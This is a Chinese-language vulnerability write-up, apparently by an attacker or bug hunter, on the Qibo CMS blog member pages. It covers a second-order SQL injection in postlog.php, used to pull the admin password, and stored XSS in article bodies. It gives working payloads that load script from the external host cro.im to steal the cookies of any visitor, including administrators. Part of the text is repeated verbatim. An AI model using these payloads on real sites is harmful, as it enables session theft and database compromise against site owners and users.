http://localhost/qibo/bk/blog/member/postlog.php?job=postlog
注册成会员之后发布日志
注入一
问题代码\blog\member\postlog.php

其中albumname 入库后出库,导致了sql注入
但是限制了长度 只能小于30位
不过后面的content,passwd无长度限制 而且全部可控,所以造成注入
利用注释 分别在两个输入点 注入出管理员密码
新建的分类填入a'\ 创建完成之后 content填入所示

其中content默认有两个2换行 换行会影响注释符号#
提交 burp拦截 我们在burp里面抓包去掉就行


同样的
注入二在blog\member\postphoto.php
问题差不多 不一一演示了
XSS
发布文章的正文 点击选择源码编辑模式 就可插入xss 其中只粗略过滤了javascript等关键字
但我们知道这远远不够

成功弹窗

我们插入<script/src=//cro.im/2B></script>
或者<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://cro.im/2B';> 均可

任意人员(包括管理员)访问 可以看到平台hook加载了

打到了cookies
新建的分类填入a'/* 创建完成之后 content填入所示

其中content默认有两个2换行 换行会影响注释符号# 我们在burp里面抓包去掉就行



我们插入<script/src=//cro.im/2B></script>
或者<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://cro.im/2B';> 均可

任意人员(包括管理员)访问 可以看到平台hook加载了

打到了cookies